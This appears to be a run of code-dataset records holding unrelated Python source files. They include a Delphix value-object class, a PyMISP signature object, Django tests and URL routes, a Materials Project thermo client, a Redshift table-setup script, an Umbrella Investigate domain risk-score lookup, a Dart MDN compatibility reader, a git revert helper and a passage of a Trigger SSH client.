isinstance(obj._name[0], basestring), (\"Expected one of [u'string'], but got %s\" % type(obj._name[0]))\n common.validate_format(obj._name[0], \"None\", None, 256)\n return obj\n\n def to_dict(self, dirty=False):\n dct = super(JSDataLayoutCreateParameters, self).to_dict(dirty)\n\n def dictify(obj):\n if isinstance(obj, list):\n return [dictify(o) for o in obj]\n elif hasattr(obj, \"to_dict\"):\n return obj.to_dict()\n else:\n return obj\n if \"data_sources\" == \"type\" or (self.data_sources is not self.__undef__ and not (dirty and not self._data_sources[1])):\n dct[\"dataSources\"] = dictify(self.data_sources)\n if \"notes\" == \"type\" or (self.notes is not self.__undef__ and not (dirty and not self._notes[1])):\n dct[\"notes\"] = dictify(self.notes)\n if \"properties\" == \"type\" or (self.properties is not self.__undef__ and not (dirty and not self._properties[1])):\n dct[\"properties\"] = dictify(self.properties)\n if \"name\" == \"type\" or (self.name is not self.__undef__ and not (dirty and not self._name[1])):\n dct[\"name\"] = dictify(self.name)\n return dct\n\n def dirty(self):\n return self.from_dict(self.to_dict(dirty=False), dirty=True)\n\n def force_dirty(self):\n self._data_sources = (self._data_sources[0], True)\n self._notes = (self._notes[0], 
True)\n self._properties = (self._properties[0], True)\n self._name = (self._name[0], True)\n\n def is_dirty(self):\n return any([self._data_sources[1], self._notes[1], self._properties[1], self._name[1]])\n\n def __eq__(self, other):\n if other is None:\n return False\n if not isinstance(other, JSDataLayoutCreateParameters):\n return False\n return super(JSDataLayoutCreateParameters, self).__eq__(other) and \\\n self.data_sources == other.data_sources and \\\n self.notes == other.notes and \\\n self.properties == other.properties and \\\n self.name == other.name\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return common.generate_repr_string(self)\n\n @property\n def data_sources(self):\n \"\"\"\n The set of data sources that belong to this data layout.\n\n :rtype: ``list`` of\n :py:class:`v1_9_0.web.vo.JSDataSourceCreateParameters`\n \"\"\"\n return self._data_sources[0]\n\n @data_sources.setter\n def data_sources(self, value):\n self._data_sources = (value, True)\n\n @property\n def notes(self):\n \"\"\"\n A description of this data layout to define what it is used for.\n\n :rtype: ``basestring``\n \"\"\"\n return self._notes[0]\n\n @notes.setter\n def notes(self, value):\n self._notes = (value, True)\n\n @property\n def properties(self):\n \"\"\"\n Key/value pairs used to specify attributes for this data layout.\n\n :rtype: ``dict``\n \"\"\"\n return self._properties[0]\n\n @properties.setter\n def properties(self, value):\n self._properties = (value, True)\n\n @property\n def name(self):\n \"\"\"\n The name of the data layout.\n\n :rtype: ``basestring``\n \"\"\"\n return self._name[0]\n\n @name.setter\n def name(self, value):\n self._name = (value, True)\n\n","sub_path":"src/main/resources/delphixpy/v1_9_0/web/vo/JSDataLayoutCreateParameters.py","file_name":"JSDataLayoutCreateParameters.py","file_ext":"py","file_size_in_byte":6479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245308667","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\nimport requests\nfrom .abstractgenerator import AbstractMISPObjectGenerator\nfrom .. 
import InvalidMISPObject\n\nclass SBSignatureObject(AbstractMISPObjectGenerator):\n '''\n Sandbox Analyzer\n '''\n def __init__(self, report, software, parsed=None, filepath=None, pseudofile=None, standalone=True, **kwargs):\n # PY3 way:\n # super().__init__(\"virustotal-report\")\n super(SBSignatureObject, self).__init__(\"sb-signature\", **kwargs)\n self._report = report\n self._software = software\n self.generate_attributes()\n\n def generate_attributes(self):\n ''' Parse the report for relevant attributes '''\n self.add_attribute(\"software\", value=self._software, type=\"text\")\n for (name, description) in self._report: \n self.add_attribute(\"signature\", value=name, comment=description, type=\"text\") \n ","sub_path":"pymisp/tools/sbsignatureobject.py","file_name":"sbsignatureobject.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592504403","text":"#coding=utf-8\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom compute.models import Center, Group\nfrom ..center import get_list\n\nfrom .tools import create_user, create_group, create_center\n\n\n\nclass CenterTest(TestCase):\n def setUp(self):\n self.u1 = create_user('apitest') \n self.c1 = create_center('测试中心', '北京', '备注')\n self.g1 = create_group(self.c1, '测试', '测试', [self.u1])\n self.c2 = create_center('测试中心2', '北京', '备注2') \n \n def test_get_list(self):\n res = get_list({'req_user': self.u1})\n self.assertDictEqual(res, {'res': True, \n 'list': [\n {'id': self.c1.id, \n 'name': self.c1.name, \n 'location': self.c1.location, \n 'desc': self.c1.desc,\n 'order': 0}\n ]})\n res2 = get_list({})\n self.assertDictContainsSubset({'res': False}, res2)\n\n res3 = get_list({'req_user': 'test'})\n self.assertDictContainsSubset({'res': False}, res3)","sub_path":"api/tests/test_center.py","file_name":"test_center.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"70221231","text":"\"\"\"\nEXERCÍCIO 046: Contagem Regressiva\n\nFaça um programa que mostre na tela uma contagem regressiva para o estouro de\nfogos de artifício, indo de 10 até 0, com uma pausa de 1 segundo entre eles.\n\"\"\"\n\nfrom time import sleep\n\ndef main():\n for i in range(10, 0, -1):\n print(i)\n sleep(1)\n print('*FOGOS DE ARTIFICIO*')\n\nif __name__ == '__main__':\n main()\n","sub_path":"introducao/exercicio046.py","file_name":"exercicio046.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"152398665","text":"from collections import defaultdict\nfrom typing import Optional, List, Tuple\nfrom mp_api.core.client import BaseRester\nfrom emmet.core.thermo import ThermoDoc\nfrom pymatgen.core.periodic_table import Element\n\n\nclass ThermoRester(BaseRester):\n\n suffix = \"thermo\"\n document_model = ThermoDoc # type: ignore\n supports_versions = True\n primary_key = \"material_id\"\n\n def search_thermo_docs(\n self,\n material_ids: Optional[List[str]] = None,\n chemsys_formula: Optional[str] = None,\n nelements: Optional[Tuple[int, int]] = None,\n is_stable: Optional[bool] = None,\n total_energy: Optional[Tuple[float, float]] = None,\n formation_energy: Optional[Tuple[float, float]] = None,\n energy_above_hull: Optional[Tuple[float, float]] = None,\n equillibrium_reaction_energy: Optional[Tuple[float, float]] = None,\n uncorrected_energy: 
Optional[Tuple[float, float]] = None,\n sort_field: Optional[str] = None,\n ascending: Optional[bool] = None,\n num_chunks: Optional[int] = None,\n chunk_size: int = 1000,\n all_fields: bool = True,\n fields: Optional[List[str]] = None,\n ):\n \"\"\"\n Query core material docs using a variety of search criteria.\n\n Arguments:\n material_ids (List[str]): List of Materials Project IDs to return data for.\n chemsys_formula (str): A chemical system (e.g., Li-Fe-O),\n or formula including anonomyzed formula\n or wild cards (e.g., Fe2O3, ABO3, Si*).\n nelements (Tuple[int,int]): Minimum and maximum number of elements in the material to consider.\n is_stable (bool): Whether the material is stable.\n total_energy (Tuple[float,float]): Minimum and maximum corrected total energy in eV/atom to consider.\n formation_energy (Tuple[float,float]): Minimum and maximum formation energy in eV/atom to consider.\n energy_above_hull (Tuple[float,float]): Minimum and maximum energy above the hull in eV/atom to consider.\n equillibrium_reaction_energy (Tuple[float,float]): Minimum and maximum equilibrium reaction energy\n in eV/atom to consider.\n uncorrected_energy (Tuple[float,float]): Minimum and maximum uncorrected total\n energy in eV/atom to consider.\n sort_field (str): Field used to sort results.\n ascending (bool): Whether sorting should be in ascending order.\n num_chunks (int): Maximum number of chunks of data to yield. None will yield all possible.\n chunk_size (int): Number of data entries per chunk.\n all_fields (bool): Whether to return all fields in the document. Defaults to True.\n fields (List[str]): List of fields in ThermoDoc to return data for.\n Default is material_id and last_updated if all_fields is False.\n\n Returns:\n ([ThermoDoc]) List of thermo documents\n \"\"\"\n\n query_params = defaultdict(dict) # type: dict\n\n if chemsys_formula:\n query_params.update({\"formula\": chemsys_formula})\n\n if material_ids:\n query_params.update({\"material_ids\": \",\".join(material_ids)})\n\n if nelements:\n query_params.update(\n {\"nelements_min\": nelements[0], \"nelements_max\": nelements[1]}\n )\n\n if is_stable is not None:\n query_params.update({\"is_stable\": is_stable})\n\n if sort_field:\n query_params.update({\"sort_field\": sort_field})\n\n if ascending is not None:\n query_params.update({\"ascending\": ascending})\n\n name_dict = {\n \"total_energy\": \"energy_per_atom\",\n \"formation_energy\": \"formation_energy_per_atom\",\n \"energy_above_hull\": \"energy_above_hull\",\n \"equillibrium_reaction_energy\": \"equillibrium_reaction_energy_per_atom\",\n \"uncorrected_energy\": \"uncorrected_energy_per_atom\",\n }\n\n for param, value in locals().items():\n if \"energy\" in param and value:\n query_params.update(\n {\n \"{}_min\".format(name_dict[param]): value[0],\n \"{}_max\".format(name_dict[param]): value[1],\n }\n )\n\n query_params = {\n entry: query_params[entry]\n for entry in query_params\n if query_params[entry] is not None\n }\n\n return super().search(\n num_chunks=num_chunks,\n chunk_size=chunk_size,\n all_fields=all_fields,\n fields=fields,\n **query_params,\n )\n","sub_path":"src/mp_api/routes/thermo/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"374623585","text":"import configparser # Parse configuration file\nimport psycopg2 # PostgreSQL database adapter for the Python\nimport sys # Used for exiting python script in case of 
error\n#from no_op_sql_queries import create_table_queries, drop_table_queries #Non-Optimized DWH Tables\nfrom sql_queries import create_table_queries, drop_table_queries # SQL query definitions\n\n\"\"\"\nPurpose:\n    Loops through drop_table_queries list and runs drop table queries\n    drop_table_queries are defined in sql_queries file\nArg:\n    cur - Redshift connection cursor [Required]\n    conn - Redshift connection [Required]\n\"\"\"\ndef drop_tables(cur, conn):\n    num_queries = len(drop_table_queries)\n    query_count = 0\n    for query in drop_table_queries:\n        query_count += 1\n        print(\"Running \", query_count, \"/\", num_queries, \" drop table queries\")\n        cur.execute(query)\n        conn.commit()\n\n\"\"\"\nPurpose:\n    Loops through create_table_queries list and runs create table queries\n    create_table_queries are defined in sql_queries file\nArg:\n    cur - Redshift connection cursor [Required]\n    conn - Redshift connection [Required]\n\"\"\"\ndef create_tables(cur, conn):\n    num_queries = len(create_table_queries)\n    query_count = 0\n    for query in create_table_queries:\n        query_count += 1\n        print(\"Running \", query_count, \"/\", num_queries, \" create table queries\")\n        cur.execute(query)\n        conn.commit()\n\n\"\"\"\nPurpose:\n    Reads Redshift Cluster connection info stored in dwh.cfg config file\n    Connects to cluster using config details and retrieves Connection and Cursor handle\n    Upon connecting successfully, calls drop_tables() and create_tables() functions\n\"\"\"\ndef main():\n    config = configparser.ConfigParser()\n    # Open and Read config file to retrieve Cluster and DWH details required to connect\n    print(\"Reading 'dwh.cfg' Config file...\")\n    try:\n        config.read('dwh.cfg')\n        print(\"Complete reading 'dwh.cfg' Config file\")\n    except Exception as e:\n        print(\"Error reading Config file: \", e)\n        sys.exit()\n\n    # Creating a connection using Cluster and DWH details stored in config file\n    print(\"Connecting to Data Warehouse...\")\n    try:\n        conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n        print(\"Connected to Data Warehouse\")\n    except Exception as e:\n        print(\"Error connecting Data Warehouse: \", e)\n        sys.exit()\n\n    # Getting connection cursor\n    print(\"Getting Cursor\")\n    try:\n        cur = conn.cursor()\n        print(\"Connection cursor retrieved\")\n    except Exception as e:\n        print(\"Error getting connection cursor: \", e)\n        print(\"Closing connection to data warehouse...\")\n        conn.close()\n        sys.exit()\n\n    # Running Drop Table queries\n    print(\"Running Drop Table queries...\")\n    try:\n        drop_tables(cur, conn)\n        print(\"Drop table queries complete\")\n    except Exception as e:\n        print(\"Error dropping tables: \", e)\n        print(\"Closing connection to data warehouse...\")\n        conn.close()\n        sys.exit()\n\n    # Running Create Table queries\n    print(\"Running Create Table queries...\")\n    try:\n        create_tables(cur, conn)\n        print(\"Create table queries complete\")\n    except Exception as e:\n        print(\"Error creating tables: \", e)\n        print(\"Closing connection to data warehouse...\")\n        conn.close()\n        sys.exit()\n\n    # Closing connection\n    print(\"Closing connection to data warehouse...\")\n    conn.close()\n\n\n\"\"\"\n    Run above code if the file is labeled __main__\n    Python internally labels files at runtime to differentiate between imported files and main file\n\"\"\"\nif __name__ == \"__main__\":\n    
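# Entry point: connect to the warehouse, then drop and recreate all DWH tables\n    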
main()\n","sub_path":"create_table.py","file_name":"create_table.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"558555876","text":"string = \"bien le bonjour !\"\n\nfor i, j in zip(string[::2],string[1::2]):\n newString = (i.lower() + j.upper())\n print(newString,end=\"\") \n \nret = \"\"\ni = True\nfor x in string:\n print(i)\n if i:\n ret += x.upper()\n else:\n ret += x.lower()\n if x != \" \":\n i = not i\nprint(ret)\n\n\n# for i in string:\n# i = not i\n# print(i)\n","sub_path":"Python/Majuscule.py","file_name":"Majuscule.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"380344911","text":"# import warnings\n# warnings.simplefilter('error', DeprecationWarning)\n\nfrom django.conf.urls.defaults import patterns\nfrom django.views.generic.list import ListView\nfrom directory.models import Club\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nurlpatterns = patterns(\n 'directory.views',\n (r'^$', 'index'),\n (r'^analytics\\.html$', 'analytics'),\n (r'^country/(?P[a-zA-Z -]+)/$', 'country'),\n (r'^(?P[a-z]{2})-clubs\\.html$', 'state'),\n (r'^city/(?P\\d+)/(?:(?P[\\w-]+)-clubs\\.html)?$', 'city'),\n (r'^(?P[a-z]{2})-hookups\\.html$', 'state2'),\n (r'^club/(?P\\d+)/(?:(?P[\\w-]+)\\.html)?$', 'club'),\n (r'^club/change/(?P\\d+)/$', 'change_club'),\n (r'^club/added/(?P\\d+)/$', 'club_added'),\n (r'^clubs/$', 'clubs'),\n (r'^club/take/(?P\\d+)/$', 'take_club'),\n (r'^club/add/$', 'add_club'),\n (r'^hookup/(?P\\d+)/(?:(?P[\\w-]+)\\.html)?$', 'hookup'),\n (r'^ajax/get-country-cities/$', 'ajax_get_country_cities'),\n (r'^tradingmap\\.html$', 'tradingmap'),\n (r'^csvmap\\.csv$', 'csvmap'),\n)\n\n# redirect url for club\nurlpatterns += patterns('', (r'^shorturl/(?P\\d+)/$', ListView.as_view, {\n 'queryset': Club.objects.all(),\n 'template_name': 'directory/shorturl.html',\n 'template_object_name': 'club'\n}),\n)\n\n# urls for admin_views functions\nurlpatterns += patterns(\n 'directory.admin_views',\n (r'state/(?P\\d+)/$', 'state_cities'),\n (r'geocoder/$', 'geocoder_proxy'),\n (r'current_state/$', 'get_current_state'),\n)\n\nif settings.DEBUG:\n # add one of these for every non-static root you want to serve\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n # this take cares of static media (i.e. 
bundled in apps, and specified in settings)\n    urlpatterns += staticfiles_urlpatterns()\n","sub_path":"apps/directory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"248646279","text":"import numpy as py\r\nfrom numpy import array as numpyarray\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras.models import load_model\r\nimport random\r\n\r\nMODEL_FILE = \"model_18_5000.h5\"\r\nMODEL2_FILE = \"model_18_5000.h5\"\r\n\r\nmodel = load_model(MODEL_FILE)\r\nmodel2 = load_model(MODEL2_FILE)\r\n\r\nround_played = 0\r\n\r\nnetwork_prediction = 0\r\nnetwork2_prediction = 0\r\n\r\nnetwork_wins = 0\r\nnetwork2_wins = 0\r\n\r\nmodel_size = 18\r\nmodel2_size = 18\r\n\r\n#human_wins = 0\r\ndraw = 0\r\nmoves = []\r\nmoves2 = []\r\n\r\nwhile True:\r\n    try:\r\n        rounds = int(input(\"How many rounds would you like to play?\"))\r\n    except ValueError:\r\n        print(\"Please enter a valid number\")\r\n    else:\r\n        break\r\n\r\ndef rules(num):\r\n    if num == 0:\r\n        return \"rock\"\r\n    if num == 1:\r\n        return \"paper\"\r\n    if num == 2:\r\n        return \"scissors\"\r\n\r\ndef result():\r\n    global network_wins\r\n    global network2_wins\r\n    global round_played\r\n    round_played += 1\r\n    if network_prediction == network2_prediction:\r\n        print(\"draw\")\r\n    elif(network_prediction == ((network2_prediction +1)%3)):\r\n        network_wins += 1\r\n        print(\"network 1 wins\")\r\n    elif(network2_prediction == ((network_prediction +1)%3)):\r\n        network2_wins += 1\r\n        print(\"network 2 wins\")\r\n    print(\" network 1 won \" , network_wins , \" network 2 won \" , network2_wins , \" round played \" , round_played )\r\n    print(\"Winrate of neural network 1 = \" , network_wins/round_played*100 , \"%\" , \" Winrate of neural network 2 = \", network2_wins/round_played*100 , \"%\")\r\n\r\n\r\nfor i in range(rounds):\r\n    # Trim each move history back down to its model's window size\r\n    while len(moves) > model_size:\r\n        del moves[0]\r\n\r\n    while len(moves2) > model2_size:\r\n        del moves2[0]\r\n    print(\"network 1 : \" , rules(network_prediction))\r\n    print(\"network 2 : \" , rules(network2_prediction))\r\n    result()\r\n","sub_path":"neural_rps.py","file_name":"neural_rps.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"409661612","text":"import requests\nimport json\n\nhost = \"investigate.api.umbrella.com\"\napi_key = \"a0b1c2d3-e4f5-g6h7-i8j9-kalbmcndoepf\"\ndomain = \"internetbadguys.com\"\n\nprint(f\"\\n==> Checking domain against Umbrella Investigate to get risk score\")\n\nurl = f\"https://{host}/domains/risk-score/{domain}\"\nheaders = {'Authorization':'Bearer ' + api_key}\n\ntry:\n\tresponse = requests.get(url, headers=headers)\n\tresponse.raise_for_status()\nexcept requests.exceptions.RequestException as e:\n\traise SystemExit(e)\n\nprint (domain)\nprint (response.json())","sub_path":"sample-code/umbrella-single-domain-risk-score.py","file_name":"umbrella-single-domain-risk-score.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"135812846","text":"# This file is part of utils.\n#\n# Developed for the LSST Data Management System.\n# This product includes software developed by the LSST Project\n# (https://www.lsst.org).\n# See the COPYRIGHT file at the top-level directory of this distribution\n# for details of code ownership.\n#\n# Use of this source code is governed by a 3-clause BSD-style\n# license that can be found in the LICENSE 
file.\n\n__all__ = [\"get_caller_name\"]\n\nimport inspect\n\n\ndef get_caller_name(skip: int = 2) -> str:\n    \"\"\"Get the name of the caller method.\n\n    Any item that cannot be determined (or is not relevant, e.g. a free\n    function has no class) is silently omitted, along with an\n    associated separator.\n\n    Parameters\n    ----------\n    skip : `int`\n        How many levels of stack to skip while getting caller name;\n        1 means \"who calls me\", 2 means \"who calls my caller\", etc.\n\n    Returns\n    -------\n    name : `str`\n        Name of the caller as a string in the form ``module.class.method``.\n        An empty string is returned if ``skip`` exceeds the stack height.\n\n    Notes\n    -----\n    Adapted from http://stackoverflow.com/a/9812105\n    by adding support to get the class from ``parentframe.f_locals['cls']``\n    \"\"\"\n    stack = inspect.stack()\n    start = 0 + skip\n    if len(stack) < start + 1:\n        return ''\n    parentframe = stack[start][0]\n\n    name = []\n    module = inspect.getmodule(parentframe)\n    if module:\n        name.append(module.__name__)\n    # add class name, if any\n    if 'self' in parentframe.f_locals:\n        name.append(type(parentframe.f_locals['self']).__name__)\n    elif 'cls' in parentframe.f_locals:\n        name.append(parentframe.f_locals['cls'].__name__)\n    codename = parentframe.f_code.co_name\n    if codename != '<module>':  # top level usually\n        name.append(codename)  # function or a method\n    return \".\".join(name)\n","sub_path":"python/lsst/utils/get_caller_name.py","file_name":"get_caller_name.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235525501","text":"#!/usr/bin/python\n# Copyright (c) 2020, the Dart project authors. Please see the AUTHORS file\n# for details. All rights reserved. Use of this source code is governed by a\n# BSD-style license that can be found in the LICENSE file.\n\nimport json\nimport os.path\nimport sys\n\n\ndef _get_browser_compat_data():\n    current_dir = os.path.dirname(__file__)\n\n    browser_compat_folder = os.path.abspath(\n        os.path.join(current_dir, '..', '..', '..', 'third_party', 'mdn',\n                     'browser-compat-data', 'src'))\n\n    if not os.path.exists(browser_compat_folder):\n        raise RuntimeError('Browser compatibility data not found at %s' %\n                           browser_compat_folder)\n\n    browser_compat_data = {}\n\n    INCLUDE_DIRS = [\n        'api',\n        'html',\n        'svg',\n        # TODO(srujzs): add more if needed\n    ]\n\n    # Transform to absolute paths\n    INCLUDE_DIRS = [\n        os.path.join(browser_compat_folder, dir) for dir in INCLUDE_DIRS\n    ]\n\n    def process_json_dict(json_dict):\n        # Returns a tuple of the interface name and the metadata corresponding\n        # to it.\n        if 'api' in json_dict:\n            # Get the interface name\n            api_dict = json_dict['api']\n            interface_name = api_dict.keys()[0]\n            return (interface_name, api_dict[interface_name])\n        elif 'html' in json_dict:\n            html_dict = json_dict['html']\n            if 'elements' in html_dict:\n                elements_dict = html_dict['elements']\n                element_name = elements_dict.keys()[0]\n                # Convert to WebCore name\n                interface = str('HTML' + element_name + 'Element')\n                return (interface, elements_dict[element_name])\n        elif 'svg' in json_dict:\n            svg_dict = json_dict['svg']\n            if 'elements' in svg_dict:\n                elements_dict = svg_dict['elements']\n                element_name = elements_dict.keys()[0]\n                # Convert to WebCore name\n                interface = str('SVG' + element_name + 'Element')\n                return (interface, elements_dict[element_name])\n        return (None, None)\n\n    def visitor(arg, dir_path, names):\n\n        def should_process_dir(dir_path):\n            if os.path.abspath(dir_path) 
== browser_compat_folder:\n return True\n for dir in INCLUDE_DIRS:\n if dir_path.startswith(dir):\n return True\n return False\n\n if should_process_dir(dir_path):\n for name in names:\n file_name = os.path.join(dir_path, name)\n (interface_path, ext) = os.path.splitext(file_name)\n if ext == '.json':\n with open(file_name) as src:\n json_dict = json.load(src)\n interface, metadata = process_json_dict(json_dict)\n if not interface is None:\n # Note: interface and member names do not\n # necessarily have the same capitalization as\n # WebCore, so we keep them all lowercase for easier\n # matching later.\n interface = interface.lower()\n metadata = {\n member.lower(): info\n for member, info in metadata.items()\n }\n\n if interface in browser_compat_data:\n browser_compat_data[interface].update(metadata)\n else:\n browser_compat_data[interface] = metadata\n else:\n names[:] = [] # Do not go underneath\n\n os.path.walk(browser_compat_folder, visitor, browser_compat_folder)\n\n return browser_compat_data\n\n\nclass MDNReader(object):\n # Statically initialize and treat as constant.\n _BROWSER_COMPAT_DATA = _get_browser_compat_data()\n\n def __init__(self):\n self._compat_overrides = {}\n\n def _get_attr_compatibility(self, compat_data):\n # Parse schema syntax of MDN data:\n # https://github.com/mdn/browser-compat-data/blob/master/schemas/compat-data.schema.json\n\n # For now, we will require support for browsers since the last IDL roll.\n # TODO(srujzs): Determine if this is too conservative.\n browser_version_map = {\n 'chrome': 63,\n 'firefox': 57,\n 'safari': 11,\n # We still support the latest version of IE.\n 'ie': 11,\n 'opera': 50,\n }\n version_key = 'version_added'\n for browser in browser_version_map.keys():\n support_data = compat_data['support']\n if browser not in support_data:\n return False\n support_statement = support_data[browser]\n if isinstance(support_statement, list): # array_support_statement\n # TODO(srujzs): Parse this list to determine compatibility. Will\n # likely require parsing for 'version_removed' keys. Notes about\n # which browser version enabled this attribute for which\n # platform also complicates things. 
For now, we assume it's not\n # compatible.\n return False\n if len(support_statement.keys()) > 1:\n # If it's anything more complicated than 'version_added', like\n # 'notes' that specify platform versions, we assume it's not\n # compatible.\n return False\n version = support_statement[version_key]\n if not version or browser_version_map[browser] < float(version):\n # simple_support_statement\n return False\n # If the attribute is experimental, we assume it's not compatible.\n status_data = compat_data['status']\n experimental_key = 'experimental'\n if experimental_key in status_data and \\\n status_data[experimental_key]:\n return False\n return True\n\n def is_compatible(self, attribute):\n # Since capitalization isn't consistent across MDN and WebCore, we\n # compare lowercase equivalents for interface and attribute names.\n interface = attribute.doc_js_interface_name.lower()\n if interface in self._BROWSER_COMPAT_DATA and attribute.id and len(\n attribute.id) > 0:\n interface_dict = self._BROWSER_COMPAT_DATA[interface]\n id_name = attribute.id.lower()\n secure_context_key = 'isSecureContext'\n if interface in self._compat_overrides and id_name in self._compat_overrides[\n interface]:\n return self._compat_overrides[interface][id_name]\n elif secure_context_key in interface_dict:\n # If the interface requires a secure context, all attributes are\n # implicitly incompatible.\n return False\n elif id_name in interface_dict:\n id_data = interface_dict[id_name]\n return self._get_attr_compatibility(id_data['__compat'])\n else:\n # Might be an attribute that is defined in a parent interface.\n # We defer until attribute emitting to determine if this is the\n # case. Otherwise, return None.\n pass\n return None\n\n def set_compatible(self, attribute, compatible):\n # Override value in the MDN browser compatibility data.\n if not compatible in [True, False, None]:\n raise ValueError('Cannot set a non-boolean object for compatible')\n interface = attribute.doc_js_interface_name.lower()\n if not interface in self._compat_overrides:\n self._compat_overrides[interface] = {}\n if attribute.id and len(attribute.id) > 0:\n id_name = attribute.id.lower()\n self._compat_overrides[interface][id_name] = compatible\n","sub_path":"tools/dom/scripts/mdnreader.py","file_name":"mdnreader.py","file_ext":"py","file_size_in_byte":8054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"201185265","text":"from commands import getoutput\nfrom os import system\nimport sys\n\ndef main():\n for issue in get_issue_commits(sys.argv[1]):\n system(\"git revert --no-edit \" + issue)\n\ndef get_issue_commits(issue):\n issues = []\n\n for line in get_log().split('\\n'):\n if issue in line:\n issues.append(line.split()[0])\n\n return issues\n\ndef get_log():\n log = getoutput(\"git log --pretty=oneline --abbrev-commit --date=relative\")\n\n return log\n\nmain()\n","sub_path":"git-revert-by-issue.py","file_name":"git-revert-by-issue.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481637324","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nLogin and basic command-line interaction support using the Twisted asynchronous\nI/O framework. 
The Trigger Twister is just like the Mersenne Twister, except\nnot at all.\n\"\"\"\n\nimport fcntl\nimport os\nimport re\nimport signal\nimport struct\nimport sys\nimport tty\nfrom copy import copy\nfrom collections import deque\nfrom crochet import wait_for, run_in_reactor, setup, EventLoop\n\nsetup()\n\nfrom twisted.conch.ssh import session, common\nfrom twisted.conch.ssh.channel import SSHChannel\nfrom twisted.conch.endpoints import (SSHCommandClientEndpoint,\n _NewConnectionHelper,\n _ExistingConnectionHelper,\n _CommandTransport, TCP4ClientEndpoint,\n connectProtocol,\n _UserAuth,\n _ConnectionReady)\nfrom twisted.internet import defer, protocol, reactor, threads\nfrom twisted.internet.task import LoopingCall\nfrom twisted.protocols.policies import TimeoutMixin\nfrom twisted.python import log\n\nfrom trigger.conf import settings\nfrom trigger import tacacsrc, exceptions\nfrom trigger.twister import is_awaiting_confirmation, has_ioslike_error, TriggerSSHUserAuth\nfrom twisted.internet import reactor\n\n\n@run_in_reactor\ndef generate_endpoint(device):\n \"\"\"Generate Trigger endpoint for a given device.\n\n The purpose of this function is to generate endpoint clients for use by a `~trigger.netdevices.NetDevice` object.\n\n :param device: `~trigger.netdevices.NetDevice` object\n \"\"\"\n creds = tacacsrc.get_device_password(device.nodeName)\n return TriggerSSHShellClientEndpointBase.newConnection(\n reactor, creds.username, device, password=creds.password\n )\n\nclass SSHSessionAddress(object):\n \"\"\"This object represents an endpoint's session details.\n\n This object would typically be loaded as follows:\n\n :Example:\n >>> sess = SSHSessionAddress()\n >>> sess.server = \"1.2.3.4\"\n >>> sess.username = \"cisco\"\n >>> sess.command = \"\"\n \n We load command with a null string as Cisco device's typically do not support bash!\n \"\"\"\n def __init__(self, server, username, command):\n self.server = server\n self.username = username\n self.command = command\n\n\nclass _TriggerShellChannel(SSHChannel):\n \"\"\"This is the Trigger subclassed Channel object.\n \"\"\"\n name = b'session'\n\n def __init__(self, creator, command, protocolFactory, commandConnected, incremental,\n with_errors, prompt_pattern, timeout, command_interval):\n SSHChannel.__init__(self)\n self._creator = creator\n self._protocolFactory = protocolFactory\n self._command = command\n self._commandConnected = commandConnected\n self.incremental = incremental\n self.with_errors = with_errors\n self.prompt = prompt_pattern\n self.timeout = timeout\n self.command_interval = command_interval\n self._reason = None\n\n def openFailed(self, reason):\n \"\"\"Channel failed handler.\"\"\"\n self._commandConnected.errback(reason)\n\n\n def channelOpen(self, ignored):\n \"\"\"Channel opened handler.\n \n Once channel is opened, setup the terminal environment and signal\n endpoint to load the shell subsystem.\n \"\"\"\n pr = session.packRequest_pty_req(os.environ['TERM'],\n self._get_window_size(), '')\n self.conn.sendRequest(self, 'pty-req', pr)\n\n command = self.conn.sendRequest(\n self, 'shell', '', wantReply=True)\n # signal.signal(signal.SIGWINCH, self._window_resized)\n command.addCallbacks(self._execSuccess, self._execFailure)\n\n def _window_resized(self, *args):\n \"\"\"Triggered when the terminal is rezied.\"\"\"\n win_size = self._get_window_size()\n new_size = win_size[1], win_size[0], win_size[2], win_size[3]\n self.conn.sendRequest(self, 'window-change',\n struct.pack('!4L', *new_size))\n\n def 
